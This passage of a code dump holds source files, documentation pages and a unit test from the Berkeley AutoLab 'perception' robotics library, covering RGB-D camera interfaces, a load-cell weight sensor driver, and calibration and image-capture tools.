"text": "import numpy as np\nimport rospy\nfrom autolab_core import ColorImage, DepthImage, Image\nfrom autolab_core.constants import MM_TO_METERS\n\nfrom perception.srv import ImageBuffer, ImageBufferResponse\n\nfrom .primesense_sensor import PrimesenseSensor\n\nImageBufferResponse = rospy.numpy_msg.numpy_msg(ImageBufferResponse)\nImageBuffer._response_class = ImageBufferResponse\n\n\nclass PrimesenseSensor_ROS(PrimesenseSensor):\n \"\"\"ROS-based version of Primesense RGBD sensor interface\n\n Requires starting the openni2 ROS driver and the two stream_image_buffer\n (image_buffer.py) ros services for depth and color images. By default,\n the class will look for the depth_image buffer and color_image buffers\n under \"{frame}/depth/stream_image_buffer\" and\n \"{frame}/rgb/stream_image_buffer\" respectively (within the current\n ROS namespace).\n\n This can be changed by passing in depth_image_buffer, color_image_buffer\n (which change where the program looks for the buffer services) and\n depth_absolute, color_absolute (which changes whether the program prepends\n the current ROS namespace).\n \"\"\"\n\n def __init__(\n self,\n depth_image_buffer=None,\n depth_absolute=False,\n color_image_buffer=None,\n color_absolute=False,\n flip_images=True,\n frame=None,\n staleness_limit=10.0,\n timeout=10,\n ):\n self._flip_images = flip_images\n self._frame = frame\n\n self.staleness_limit = staleness_limit\n self.timeout = timeout\n\n if self._frame is None:\n self._frame = \"primesense\"\n self._color_frame = \"%s_color\" % (self._frame)\n self._ir_frame = (\n self._frame\n ) # same as color since we normally use this one\n\n # Set image buffer locations\n self._depth_image_buffer = (\n \"{0}/depth/stream_image_buffer\".format(frame)\n if depth_image_buffer is None\n else depth_image_buffer\n )\n self._color_image_buffer = (\n \"{0}/rgb/stream_image_buffer\".format(frame)\n if color_image_buffer is None\n else color_image_buffer\n )\n if not depth_absolute:\n self._depth_image_buffer = (\n rospy.get_namespace() + self._depth_image_buffer\n )\n if not color_absolute:\n self._color_image_buffer = (\n rospy.get_namespace() + self._color_image_buffer\n )\n\n def start(self):\n \"\"\"For PrimesenseSensor, start/stop by launching/stopping\n the associated ROS services\"\"\"\n pass\n\n def stop(self):\n \"\"\"For PrimesenseSensor, start/stop by launching/stopping\n the associated ROS services\"\"\"\n pass\n\n def _ros_read_images(self, stream_buffer, number, staleness_limit=10.0):\n \"\"\"Reads images from a stream buffer\n\n Parameters\n ----------\n stream_buffer : string\n absolute path to the image buffer service\n number : int\n The number of frames to get. Must be less than the image buffer\n service's current buffer size\n staleness_limit : float, optional\n Max value of how many seconds old the oldest image is. If the\n oldest image grabbed is older than this value, a RuntimeError\n is thrown. 
If None, staleness is ignored.\n\n        Returns\n        -------\n        List of numpy.ndarray objects, each one an image\n        Images are in reverse chronological order (newest first)\n        \"\"\"\n        rospy.wait_for_service(stream_buffer, timeout=self.timeout)\n        ros_image_buffer = rospy.ServiceProxy(stream_buffer, ImageBuffer)\n        ret = ros_image_buffer(number, 1)\n        if staleness_limit is not None:\n            if ret.timestamps[-1] > staleness_limit:\n                raise RuntimeError(\n                    \"Got data {0} seconds old, \"\n                    \"more than allowed {1} seconds\".format(\n                        ret.timestamps[-1], staleness_limit\n                    )\n                )\n\n        data = ret.data.reshape(\n            ret.data_dim1, ret.data_dim2, ret.data_dim3\n        ).astype(ret.dtype)\n\n        # Special handling for 1 element, since dstack's behavior is different\n        if number == 1:\n            return [data]\n        return np.dsplit(data, number)\n\n    @property\n    def is_running(self):\n        \"\"\"bool : True if the image buffers are running, or false otherwise.\n\n        Does this by grabbing one frame with staleness checking\n        \"\"\"\n        try:\n            self.frames()\n        except RuntimeError:\n            return False\n        return True\n\n    def _read_depth_images(self, num_images):\n        \"\"\"Reads depth images from the device\"\"\"\n        depth_images = self._ros_read_images(\n            self._depth_image_buffer, num_images, self.staleness_limit\n        )\n        for i in range(0, num_images):\n            depth_images[i] = (\n                depth_images[i] * MM_TO_METERS\n            )  # convert to meters\n            if self._flip_images:\n                depth_images[i] = np.flipud(depth_images[i])\n                depth_images[i] = np.fliplr(depth_images[i])\n            depth_images[i] = DepthImage(depth_images[i], frame=self._frame)\n        return depth_images\n\n    def _read_color_images(self, num_images):\n        \"\"\"Reads color images from the device\"\"\"\n        color_images = self._ros_read_images(\n            self._color_image_buffer, num_images, self.staleness_limit\n        )\n        for i in range(0, num_images):\n            if self._flip_images:\n                color_images[i] = np.flipud(color_images[i].astype(np.uint8))\n                color_images[i] = np.fliplr(color_images[i].astype(np.uint8))\n            color_images[i] = ColorImage(color_images[i], frame=self._frame)\n        return color_images\n\n    def _read_depth_image(self):\n        \"\"\"Wrapper to maintain compatibility\"\"\"\n        return self._read_depth_images(1)[0]\n\n    def _read_color_image(self):\n        \"\"\"Wrapper to maintain compatibility\"\"\"\n        return self._read_color_images(1)[0]\n\n    def median_depth_img(self, num_img=1, fill_depth=0.0):\n        \"\"\"Collect a series of depth images and return the median of the set.\n\n        Parameters\n        ----------\n        num_img : int\n            The number of consecutive frames to process.\n\n        Returns\n        -------\n        :obj:`DepthImage`\n            The median DepthImage collected from the frames.\n        \"\"\"\n        depths = self._read_depth_images(num_img)\n\n        median_depth = Image.median_images(depths)\n        median_depth.data[median_depth.data == 0.0] = fill_depth\n        return median_depth\n\n    def min_depth_img(self, num_img=1):\n        \"\"\"Collect a series of depth images and return the min of the set.\n\n        Parameters\n        ----------\n        num_img : int\n            The number of consecutive frames to process.\n\n        Returns\n        -------\n        :obj:`DepthImage`\n            The min DepthImage collected from the frames.\n        \"\"\"\n        depths = self._read_depth_images(num_img)\n\n        return Image.min_images(depths)\n"
},
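One detail of the buffer service above worth isolating: `_ros_read_images` receives N buffered frames packed into a single (H, W, N) array and splits them back out with `np.dsplit`, special-casing N == 1 because the split path would otherwise be unnecessary. A self-contained sketch of that round trip on synthetic data:

import numpy as np

height, width, number = 4, 6, 3

# Stand-in for the stacked frames returned by the image buffer service.
data = np.random.rand(height, width, number)

# Same unpacking logic as PrimesenseSensor_ROS._ros_read_images.
frames = [data] if number == 1 else np.dsplit(data, number)
print(len(frames), frames[0].shape)  # 3 (4, 6, 1)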
{
"alpha_fraction": 0.6697247624397278,
"alphanum_fraction": 0.6857798099517822,
"avg_line_length": 26.1875,
"blob_id": "edc6d006a803a5c81696415953016b8916e1803d",
"content_id": "27d5ac2783021ab7602ce66a798d7d06c43829d7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 872,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 32,
"path": "/docs/source/index.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": ".. perception documentation master file, created by\n sphinx-quickstart on Wed Oct 26 18:16:00 2016.\n You can adapt this file completely to your liking, but it should at least\n contain the root `toctree` directive.\n\nBerkeley AutoLab Perception Documentation\n=========================================\nWelcome to the documentation for the Berkeley AutoLab's `perception` module!\nThis module is designed to be useful in a broad set of robotic perception tasks.\nThe `perception` module depends directly on AutoLab's `autolab_core`_ module.\n\n.. _autolab_core: https://github.com/BerkeleyAutomation/autolab_core\n\n.. toctree::\n :maxdepth: 2\n :caption: Installation Guide\n\n install/install.rst\n\n.. toctree::\n :maxdepth: 2\n :caption: API Documentation\n :glob:\n\n api/*\n\nIndices and tables\n==================\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`\n\n\n"
},
{
"alpha_fraction": 0.608858048915863,
"alphanum_fraction": 0.625933825969696,
"avg_line_length": 23.0256404876709,
"blob_id": "012ecd33a4757dc6620c477e9f2884a9ed785f1b",
"content_id": "ba3f564bad23e3c081c2ce1c6da562228d0d16ab",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1874,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 78,
"path": "/tools/kinect2_sensor_bridge.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\"\"\"\nInterface to the Ensenso N* Sensor\nAuthor: Jeff Mahler\n\"\"\"\nimport logging\nimport signal\nimport sys\nimport time\n\ntry:\n import rospy\nexcept ImportError:\n logging.warning(\n \"Failed to import ROS in Kinect2_sensor.py. \\\n Kinect will not be able to be used in bridged mode\"\n )\n\nfrom perception import RgbdSensorFactory\nfrom perception.kinect2_ros_sensor import Kinect2BridgedQuality\n\n\ndef main(args):\n # from visualization import Visualizer2D as vis2d\n # from visualization import Visualizer3D as vis3d\n import matplotlib.pyplot as vis2d\n\n # set logging\n logging.getLogger().setLevel(logging.DEBUG)\n rospy.init_node(\"kinect_reader\", anonymous=True)\n\n num_frames = 5\n sensor_cfg = {\n \"quality\": Kinect2BridgedQuality.HD,\n \"frame\": \"kinect2_rgb_optical_frame\",\n }\n sensor_type = \"bridged_kinect2\"\n sensor = RgbdSensorFactory.sensor(sensor_type, sensor_cfg)\n sensor.start()\n\n def handler(signum, frame):\n rospy.loginfo(\"caught CTRL+C, exiting...\")\n if sensor is not None:\n sensor.stop()\n exit(0)\n\n signal.signal(signal.SIGINT, handler)\n\n total_time = 0\n for i in range(num_frames):\n if i > 0:\n start_time = time.time()\n\n _, depth_im, _ = sensor.frames()\n\n if i > 0:\n total_time += time.time() - start_time\n logging.info(\"Frame %d\" % (i))\n logging.info(\"Avg FPS: %.5f\" % (float(i) / total_time))\n\n depth_im = sensor.median_depth_img(num_img=5)\n color_im, depth_im, _ = sensor.frames()\n\n sensor.stop()\n\n vis2d.figure()\n vis2d.subplot(\"211\")\n vis2d.imshow(depth_im.data)\n vis2d.title(\"Kinect - depth Raw\")\n\n vis2d.subplot(\"212\")\n vis2d.imshow(color_im.data)\n vis2d.title(\"kinect color\")\n vis2d.show()\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n"
},
{
"alpha_fraction": 0.5704632997512817,
"alphanum_fraction": 0.5830115675926208,
"avg_line_length": 26.626667022705078,
"blob_id": "b48bf60bf8dfd64b9da4f47fcd8466ca1100455c",
"content_id": "80cee259e89840f3da5ed1a6da6a28ceba900578",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2072,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 75,
"path": "/ros_nodes/weight_publisher.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\"\"\"Publisher node for weight sensor.\n\"\"\"\nimport rospy\nfrom std_msgs.msg import Float32MultiArray\nfrom std_srvs.srv import Empty\n\nfrom perception import WeightSensor\n\n\nclass WeightPublisher(WeightSensor):\n \"\"\"Publisher ROS node for weight sensors.\n\n Topics\n ------\n weights : Float32MultiArray\n The weights from each of the load cell sensors in grams,\n listed in order of ID.\n\n Services\n --------\n tare : Empty\n Zeros the scale at the current load.\n \"\"\"\n\n def __init__(self, rate=20.0, id_mask=\"F1804\", ntaps=4):\n \"\"\"Initialize the weight publisher.\n\n Parameters\n ----------\n rate : float\n Rate at which weight messages are published\n id_mask : str\n A template for the first n digits of the device IDs\n for valid load cells.\n ntaps : int\n Maximum number of samples to perform filtering over.\n \"\"\"\n super().__init__(id_mask, ntaps, log=False)\n self._rate = rospy.Rate(rate)\n self._pub = rospy.Publisher(\n \"~weights\", Float32MultiArray, queue_size=10\n )\n\n rospy.loginfo(\"Connecting to the Weight Sensor\")\n self.start()\n\n # Tare the sensor\n rospy.loginfo(\"Taring\")\n self.tare()\n\n # Set up tare service\n self._tare_service = rospy.Service(\"~tare\", Empty, self._handle_tare)\n\n # Main loop -- read and publish\n while not rospy.is_shutdown():\n self._pub.publish(Float32MultiArray(data=self.read()))\n self._rate.sleep()\n\n def _handle_tare(self, request):\n \"\"\"Handler for tare service.\"\"\"\n self.tare()\n return []\n\n\nif __name__ == \"__main__\":\n try:\n rospy.init_node(\"weight_sensor\")\n rate = rospy.get_param(\"~rate\", 20.0)\n id_mask = rospy.get_param(\"~id_mask\", \"F1804\")\n ntaps = rospy.get_param(\"~ntaps\", 4)\n rospy.loginfo(\"Starting\")\n WeightPublisher(rate, id_mask, ntaps)\n except rospy.ROSInterruptException:\n pass\n"
},
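A minimal client for the publisher above might look like the following; the message type and `~weights` topic come from the docstring, while the resolved topic name assumes the node name used in the `__main__` block:

#!/usr/bin/env python
"""Toy listener for the weight publisher (topic name is an assumption)."""
import rospy
from std_msgs.msg import Float32MultiArray


def on_weights(msg):
    # One entry per load cell, in grams, ordered by device ID.
    rospy.loginfo("total weight: %.2f g", sum(msg.data))


if __name__ == "__main__":
    rospy.init_node("weight_listener")
    rospy.Subscriber("weight_sensor/weights", Float32MultiArray, on_weights)
    rospy.spin()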
{
"alpha_fraction": 0.5225911736488342,
"alphanum_fraction": 0.5294864773750305,
"avg_line_length": 30.13559341430664,
"blob_id": "b46da9c1a0c9ac2d3ac5098181389fe56b877f65",
"content_id": "7b4c67da9898703aab22497a05a014f118d953c4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5511,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 177,
"path": "/perception/weight_sensor.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"Wrapper class for weight sensor.\"\"\"\nimport glob\nimport threading\nimport time\n\nimport numpy as np\nimport serial\nfrom autolab_core import Logger\nfrom scipy import signal\n\nfrom .constants import LBS_TO_GRAMS\n\n\nclass WeightSensor(object):\n \"\"\"Driver for weight sensors.\"\"\"\n\n def __init__(self, id_mask=\"F1804\", ntaps=4, log=True):\n \"\"\"Initialize the weight sensor.\n\n Parameters\n ----------\n id_mask : str\n A template for the first n digits of the device IDs\n for valid load cells.\n ntaps : int\n Maximum number of samples to perform filtering over.\n log : bool\n Use a logger\n \"\"\"\n self._id_mask = id_mask\n self._ntaps = ntaps\n self._filter_coeffs = signal.firwin(ntaps, 0.1)\n self._running = False\n self._cur_weights = None\n self._read_thread = None\n self._write_lock = threading.Condition()\n self.logger = Logger.get_logger(\"WeightSensor\") if log else None\n\n def start(self):\n \"\"\"Start the sensor\n (connect and start thread for reading weight values)\n \"\"\"\n\n if self._running:\n return\n self._serials = self._connect(self._id_mask)\n if len(self._serials) == 0:\n raise ValueError(\n \"Error -- No loadstar weight sensors connected to machine!\"\n )\n\n # Flush the sensor's communications\n self._flush()\n self._running = True\n\n # Start thread for reading weight sensor\n self._read_thread = threading.Thread(\n target=self._read_weights, daemon=True\n )\n self._read_thread.start()\n\n def stop(self):\n \"\"\"Stop the sensor.\"\"\"\n if not self._running:\n return\n self._running = False\n self._read_thread.join()\n self._serials = None\n self._read_thread = None\n\n def reset(self):\n \"\"\"Starts and stops the sensor\"\"\"\n self.stop()\n self.start()\n\n def _connect(self, id_mask):\n \"\"\"Connects to all of the load cells serially.\"\"\"\n # Get all devices attached as USB serial\n all_devices = glob.glob(\"/dev/ttyUSB*\")\n\n # Identify which of the devices are LoadStar Serial Sensors\n sensors = []\n for device in all_devices:\n try:\n ser = serial.Serial(port=device, timeout=0.5, exclusive=True)\n ser.write(\"ID\\r\".encode())\n time.sleep(0.05)\n resp = ser.read(13).decode()\n ser.close()\n\n if len(resp) >= 10 and resp[: len(id_mask)] == id_mask:\n sensors.append((device, resp.rstrip(\"\\r\\n\")))\n except (serial.SerialException, serial.SerialTimeoutException):\n continue\n sensors = sorted(sensors, key=lambda x: x[1])\n\n # Connect to each of the serial devices\n serials = []\n for device, key in sensors:\n ser = serial.Serial(port=device, timeout=0.5)\n serials.append(ser)\n if self.logger is not None:\n self.logger.info(\n \"Connected to load cell {} at {}\".format(key, device)\n )\n return serials\n\n def _flush(self):\n \"\"\"Flushes all of the serial ports.\"\"\"\n for ser in self._serials:\n ser.flush()\n ser.flushInput()\n ser.flushOutput()\n time.sleep(0.02)\n\n def tare(self):\n \"\"\"Zeros out (tare) all of the load cells.\"\"\"\n with self._write_lock:\n self._write_lock.wait()\n for ser in self._serials:\n ser.write(\"TARE\\r\".encode())\n ser.flush()\n ser.flushInput()\n ser.flushOutput()\n time.sleep(0.02)\n if self.logger is not None:\n self.logger.info(\"Tared sensor\")\n\n def read(self):\n if not self._running:\n raise ValueError(\"Weight sensor is not running!\")\n while self._cur_weights is None:\n pass\n return self._cur_weights\n\n def _read_weights(self):\n weights_buffer = []\n while self._running:\n with self._write_lock:\n if len(weights_buffer) == self._ntaps:\n weights_buffer.pop(0)\n 
weights_buffer.append(self._raw_weights())\n if len(weights_buffer) < self._ntaps:\n self._cur_weights = np.mean(weights_buffer, axis=0)\n else:\n self._cur_weights = self._filter_coeffs.dot(weights_buffer)\n self._write_lock.notify()\n time.sleep(0.005)\n\n def _raw_weights(self):\n \"\"\"Reads weights from each of the load cells.\"\"\"\n weights = []\n\n # Read from each of the sensors\n for ser in self._serials:\n ser.write(\"W\\r\".encode())\n ser.flush()\n time.sleep(0.02)\n for ser in self._serials:\n try:\n output_str = ser.readline().decode()\n weight = float(output_str) * LBS_TO_GRAMS\n weights.append(weight)\n except (serial.SerialException, ValueError):\n weights.append(0.0)\n\n # Log the output\n if self.logger is not None:\n log_output = \"\"\n for w in weights:\n log_output += \"{:.2f} \".format(w)\n self.logger.debug(log_output)\n\n return weights\n\n def __del__(self):\n self.stop()\n"
},
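The smoothing in `_read_weights` above is a short FIR low-pass: `signal.firwin(ntaps, 0.1)` produces `ntaps` coefficients summing to roughly 1, and dotting them against the last `ntaps` readings yields the filtered value per cell. A standalone sketch with made-up readings from two load cells:

import numpy as np
from scipy import signal

ntaps = 4
coeffs = signal.firwin(ntaps, 0.1)  # low-pass taps, sum close to 1.0

# Fake ring buffer: the last ntaps readings from two load cells (grams).
weights_buffer = np.array(
    [[100.2, 50.1], [99.8, 49.9], [100.1, 50.0], [100.0, 50.0]]
)

filtered = coeffs.dot(weights_buffer)  # shape (2,): one value per cell
print(np.round(filtered, 2))  # roughly [100.0, 50.0]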
{
"alpha_fraction": 0.6741573214530945,
"alphanum_fraction": 0.6741573214530945,
"avg_line_length": 22.421052932739258,
"blob_id": "a8bd9bbfbe80d96b5f6fecd05159174cdf26f7d7",
"content_id": "bd93d2329f972e9331c43d524bdee1bcf5180791",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 445,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 19,
"path": "/docs/source/api/registration.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "Point Cloud Registration\n========================\nClasses for point cloud registration.\n\nIterativeRegistrationSolver\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\nAbstract class for iterative point cloud registration algorithms.\n\n.. autoclass:: perception.IterativeRegistrationSolver\n\nRegistrationResult\n~~~~~~~~~~~~~~~~~~\n.. autoclass:: perception.RegistrationResult\n\n\nPointToPlaneICPSolver\n~~~~~~~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.PointToPlaneICPSolver\n"
},
{
"alpha_fraction": 0.5876288414001465,
"alphanum_fraction": 0.5876288414001465,
"avg_line_length": 15.166666984558105,
"blob_id": "8e90f0b65449a70ce771bbe56bfeb3b00bb47e75",
"content_id": "9ac8444794c94a55c13e4ffec1a5cefc90f45d23",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 97,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 6,
"path": "/docs/source/api/video.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "Video Classes\n=============\n\nVideoRecorder\n~~~~~~~~~~~~~\n.. autoclass:: perception.VideoRecorder\n"
},
{
"alpha_fraction": 0.525560200214386,
"alphanum_fraction": 0.5392156839370728,
"avg_line_length": 31.827587127685547,
"blob_id": "377253dcacfa3c065576f0d5f51a83953e21e01b",
"content_id": "e12a4bee13445f874f7dcde29b19b1b9e31a825e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2856,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 87,
"path": "/tests/test_rgbd_sensors.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "import os\nimport unittest\n\nimport numpy as np\nfrom autolab_core import CameraIntrinsics, ColorImage, DepthImage\n\nfrom perception import RgbdSensorFactory\n\nIM_FILEROOT = \"tests/data\"\n\n\nclass TestRgbdSensors(unittest.TestCase):\n def test_virtual(self, height=100, width=100):\n # Generate folder of color and depth images\n if not os.path.exists(IM_FILEROOT):\n os.makedirs(IM_FILEROOT)\n cam_intr = CameraIntrinsics(\n \"a\",\n fx=0.0,\n fy=0.0,\n cx=0.0,\n cy=0.0,\n skew=0.0,\n height=100,\n width=100,\n )\n cam_intr.save(os.path.join(IM_FILEROOT, \"a.intr\"))\n color_data = (255 * np.random.rand(10, height, width, 3)).astype(\n np.uint8\n )\n depth_data = np.random.rand(10, height, width).astype(np.float32)\n for i in range(10):\n im = ColorImage(color_data[i], frame=\"a\")\n im.save(os.path.join(IM_FILEROOT, \"color_{:d}.png\".format(i)))\n\n im = DepthImage(depth_data[i], frame=\"a\")\n im.save(os.path.join(IM_FILEROOT, \"depth_{:d}.npy\".format(i)))\n\n # Create virtual camera\n virtual_cam = RgbdSensorFactory.sensor(\n \"virtual\", cfg={\"image_dir\": IM_FILEROOT, \"frame\": \"a\"}\n )\n self.assertTrue(\n virtual_cam.path_to_images == IM_FILEROOT,\n msg=\"img path changed after init\",\n )\n\n # Start virtual camera and read frames\n virtual_cam.start()\n self.assertTrue(\n virtual_cam.is_running, msg=\"camera not running after start\"\n )\n for i in range(10):\n color, depth = virtual_cam.frames()\n self.assertTrue(\n np.all(color.data == color_data[i]),\n msg=\"color data for img {:d} changed\".format(i),\n )\n self.assertTrue(\n color.frame == virtual_cam.frame,\n msg=\"frame mismatch between color im and camera\",\n )\n self.assertTrue(\n np.all(depth.data == depth_data[i]),\n msg=\"depth data for img {:d} changed\".format(i),\n )\n self.assertTrue(\n depth.frame == virtual_cam.frame,\n msg=\"frame mismatch between depth im and camera\",\n )\n\n # Make sure camera is stopped\n virtual_cam.stop()\n self.assertFalse(\n virtual_cam.is_running, msg=\"camera running after stop\"\n )\n\n # Cleanup images\n for i in range(10):\n os.remove(os.path.join(IM_FILEROOT, \"color_{:d}.png\".format(i)))\n os.remove(os.path.join(IM_FILEROOT, \"depth_{:d}.npy\".format(i)))\n os.remove(os.path.join(IM_FILEROOT, \"a.intr\"))\n os.rmdir(IM_FILEROOT)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"
},
{
"alpha_fraction": 0.592930793762207,
"alphanum_fraction": 0.6085419654846191,
"avg_line_length": 28.044248580932617,
"blob_id": "80fa35df39980ba16a0331bec9a445e60a9a9144",
"content_id": "f72687bbe40f6083e8dd9932bd1e8a8728576b1a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3395,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 113,
"path": "/tools/register_object.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nScript to register an object in world frame provided transform\r\nfrom cam to cb and from obj to cb\r\nAuthor: Jacky\r\n\"\"\"\r\nimport argparse\r\nimport logging\r\nimport os\r\n\r\nimport trimesh\r\nfrom autolab_core import (\r\n CameraChessboardRegistration,\r\n RigidTransform,\r\n YamlConfig,\r\n)\r\n\r\nfrom perception import RgbdSensorFactory\r\n\r\nVIS_SUPPORTED = True\r\ntry:\r\n from visualization import Visualizer3D as vis\r\nexcept ImportError:\r\n logging.warning(\r\n \"Failed to import visualization package. Visualization disabled\"\r\n )\r\n VIS_SUPPORTED = False\r\n\r\nif __name__ == \"__main__\":\r\n logging.getLogger().setLevel(logging.INFO)\r\n\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"object_name\")\r\n args = parser.parse_args()\r\n\r\n config_filename = \"cfg/tools/register_object.yaml\"\r\n config = YamlConfig(config_filename)\r\n\r\n sensor_frame = config[\"sensor\"][\"frame_name\"]\r\n sensor_type = config[\"sensor\"][\"type\"]\r\n sensor_config = config[\"sensor\"]\r\n\r\n object_path = os.path.join(config[\"objects_dir\"], args.object_name)\r\n obj_cb_transform_file_path = os.path.join(\r\n object_path, \"T_cb_{0}.tf\".format(args.object_name)\r\n )\r\n\r\n # load T_cb_obj\r\n T_cb_obj = RigidTransform.load(obj_cb_transform_file_path)\r\n\r\n # load T_world_cam\r\n T_world_cam_path = os.path.join(\r\n config[\"calib_dir\"],\r\n sensor_frame,\r\n \"{0}_to_world.tf\".format(sensor_frame),\r\n )\r\n T_world_cam = RigidTransform.load(T_world_cam_path)\r\n\r\n # open sensor\r\n sensor_type = sensor_config[\"type\"]\r\n sensor_config[\"frame\"] = sensor_frame\r\n sensor = RgbdSensorFactory.sensor(sensor_type, sensor_config)\r\n logging.info(\"Starting sensor\")\r\n sensor.start()\r\n ir_intrinsics = sensor.ir_intrinsics\r\n logging.info(\"Sensor initialized\")\r\n\r\n # register\r\n reg_result = CameraChessboardRegistration.register(\r\n sensor, config[\"chessboard_registration\"]\r\n )\r\n\r\n T_cb_cam = reg_result.T_camera_cb\r\n T_world_obj = T_world_cam * T_cb_cam.inverse() * T_cb_obj\r\n\r\n output_path = os.path.join(config[\"calib_dir\"], T_world_obj.from_frame)\r\n if not os.path.exists(output_path):\r\n os.makedirs(output_path)\r\n\r\n output_filename = os.path.join(\r\n output_path, \"{0}_to_world.tf\".format(T_world_obj.from_frame)\r\n )\r\n logging.info(T_world_obj)\r\n T_world_obj.save(output_filename)\r\n\r\n if config[\"vis\"] and VIS_SUPPORTED:\r\n\r\n _, depth_im, _ = sensor.frames()\r\n pc_cam = ir_intrinsics.deproject(depth_im)\r\n pc_world = T_world_cam * pc_cam\r\n\r\n mesh = trimesh.load(\r\n os.path.join(object_path, \"{0}.obj\".format(args.object_name))\r\n )\r\n\r\n vis.figure(bgcolor=(0.7, 0.7, 0.7))\r\n vis.mesh(mesh, T_world_obj.as_frames(\"obj\", \"world\"), style=\"surface\")\r\n vis.pose(T_world_obj, alpha=0.04, tube_radius=0.002, center_scale=0.01)\r\n vis.pose(\r\n RigidTransform(from_frame=\"origin\"),\r\n alpha=0.04,\r\n tube_radius=0.002,\r\n center_scale=0.01,\r\n )\r\n vis.pose(T_world_cam, alpha=0.04, tube_radius=0.002, center_scale=0.01)\r\n vis.pose(\r\n T_world_cam * T_cb_cam.inverse(),\r\n alpha=0.04,\r\n tube_radius=0.002,\r\n center_scale=0.01,\r\n )\r\n vis.points(pc_world, subsample=20)\r\n vis.show()\r\n sensor.stop()\r\n"
},
{
"alpha_fraction": 0.5582504868507385,
"alphanum_fraction": 0.5632206797599792,
"avg_line_length": 32.092105865478516,
"blob_id": "9c487684f9020f3ea6a1a8ed6f0e98b7e9f73294",
"content_id": "6718bc149cf3486417b486b4f605ea94f70a366f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5030,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 152,
"path": "/tools/capture_test_images.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nScript to capture a set of test images.\nBe sure to register camera beforehand!!!\nAuthor: Jeff Mahler\n\"\"\"\nimport argparse\nimport os\n\nimport autolab_core.utils as utils\nimport numpy as np\nimport rospy\nfrom autolab_core import Box, Logger, RigidTransform, YamlConfig\n\nfrom perception import RgbdSensorFactory\n\n# set up logger\nlogger = Logger.get_logger(\"tools/capture_test_images.py\")\n\nif __name__ == \"__main__\":\n # parse args\n parser = argparse.ArgumentParser(\n description=\"Capture a set of RGB-D images from a set of sensors\"\n )\n parser.add_argument(\n \"output_dir\", type=str, help=\"path to save captured images\"\n )\n parser.add_argument(\n \"--config_filename\",\n type=str,\n default=\"cfg/tools/capture_test_images.yaml\",\n help=\"path to configuration file to use\",\n )\n args = parser.parse_args()\n config_filename = args.config_filename\n output_dir = args.output_dir\n\n # read config\n config = YamlConfig(config_filename)\n vis = config[\"vis\"]\n\n # make output dir if needed\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n # read rescale factor\n rescale_factor = 1.0\n if \"rescale_factor\" in config.keys():\n rescale_factor = config[\"rescale_factor\"]\n\n # read workspace bounds\n workspace = None\n if \"workspace\" in config.keys():\n workspace = Box(\n np.array(config[\"workspace\"][\"min_pt\"]),\n np.array(config[\"workspace\"][\"max_pt\"]),\n frame=\"world\",\n )\n\n # init ros node\n rospy.init_node(\n \"capture_test_images\"\n ) # NOTE: this is required by the camera sensor classes\n Logger.reconfigure_root()\n\n for sensor_name, sensor_config in config[\"sensors\"].iteritems():\n logger.info(\"Capturing images from sensor %s\" % (sensor_name))\n save_dir = os.path.join(output_dir, sensor_name)\n if not os.path.exists(save_dir):\n os.mkdir(save_dir)\n\n # read params\n sensor_type = sensor_config[\"type\"]\n sensor_frame = sensor_config[\"frame\"]\n\n # read camera calib\n tf_filename = \"%s_to_world.tf\" % (sensor_frame)\n T_camera_world = RigidTransform.load(\n os.path.join(config[\"calib_dir\"], sensor_frame, tf_filename)\n )\n T_camera_world.save(os.path.join(save_dir, tf_filename))\n\n # setup sensor\n sensor = RgbdSensorFactory.sensor(sensor_type, sensor_config)\n\n # start the sensor\n sensor.start()\n camera_intr = sensor.ir_intrinsics\n camera_intr.save(os.path.join(save_dir, \"%s.intr\" % (sensor.frame)))\n\n # get raw images\n for i in range(sensor_config[\"num_images\"]):\n logger.info(\"Capturing image %d\" % (i))\n message = \"Hit ENTER when ready.\"\n utils.keyboard_input(message=message)\n\n # read images\n color, depth, ir = sensor.frames()\n\n # save processed images\n if workspace 